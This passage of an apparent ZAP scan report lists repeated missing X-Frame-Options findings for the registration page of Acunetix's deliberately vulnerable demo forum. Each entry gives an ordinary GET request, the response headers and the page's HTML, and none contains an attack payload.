| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the 